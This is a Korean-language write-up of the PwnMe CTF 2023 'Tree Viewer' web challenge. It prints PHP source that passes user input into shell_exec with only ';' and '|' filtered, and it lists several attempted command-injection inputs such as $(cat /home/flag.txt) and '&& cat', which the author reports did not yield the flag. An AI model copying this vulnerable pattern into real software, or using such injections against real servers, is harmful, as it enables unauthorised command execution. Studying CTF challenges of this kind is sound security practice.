[PwnMe CTF 2023] Tree Viewer WriteUp

# Tree Viewer WriteUp

 

1. 먼저 문제를 확인한 후, 컨테이너를 열어 웹페이지로 접속

 

 

 

 

2. 접속 후 아래와 같은 화면을 확인

 

 

 

 

3. 사용자 입력란에 '12', '/hoho/23'이라는 값을 입력해본 결과 아래와 같은 출력을 확인할 수 있었다.

 

 

 

 

4. 메인 화면의 Source code 부분을 열어 코드를 확인하였다.

<?php
$parsed = isset($_POST['input']) ? $_POST['input'] : "/home/";

preg_match_all('/[;|]/m', $parsed, $illegals, PREG_SET_ORDER, 0);
if($illegals){
    echo "Illegals chars found";
    $parsed = "/home/";
}

if(isset($_GET['source'])){
    highlight_file(__FILE__);
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Tree Viewer</title>
</head>
<body>
    <a href="/?source">Source code</a>
    <hr/>
    <form action="/" method="post">
        <label for="input">Directory to check</label>
    <input type="text" placeholder="Directory to see" id="input" name="input" value="<?= $parsed ?>">
    </form>

    <h3>Content of <?= $parsed ?>: <?= shell_exec('ls '.$parsed); ?></h3>
    
</body>
</html>

+ 코드의 첫 부분에서 입력된 폴더 경로를 파싱 

-->  입력된 경로가 존재하지 않거나, 정상적인 문자가 아닌 ' ; ' 또는 ' | '와 같은 문자가 포함되어 있는 경우 경로를 "/home/"으로 대체

 

+ HTML 폼을 렌더링하여 사용자가 Directory to check 라벨 하단에 폴더 경로를 입력할 수 있게 함 

-->  입력 필드는 input 이라는 이름으로 POST 요청을 통해 전송

 

+ h3 태그 사이의 값은 현재 경로의 파일과 폴더를 보여주며, shell_exec() 함수를 사용하여 사용자가 입력한 경로의 파일과 폴더 출력

 

 

 

 

5. 소스코드의 취약점을 이용하여 아래와 같은 입력값들로 시도해보았다.

다양한 입력값으로 시도해보았지만, 결국 FLAG를 찾지 못했다.

 

+ 시도한 입력값들

$(cat /home/flag.txt)

`cat /home/flag.txt`

system("cat /home/flag.txt")

$(cat /home/flag.txt)

$(cat /home/flag.txt >&2)

$(ls /home/; cat /home/flag.txt)

$((cat /home/flag.txt))

${cat,/home/flag.txt}

/home/flag && cat /home/flag.txt

/home/11; cat /home/flag.txt

/home/flag.txt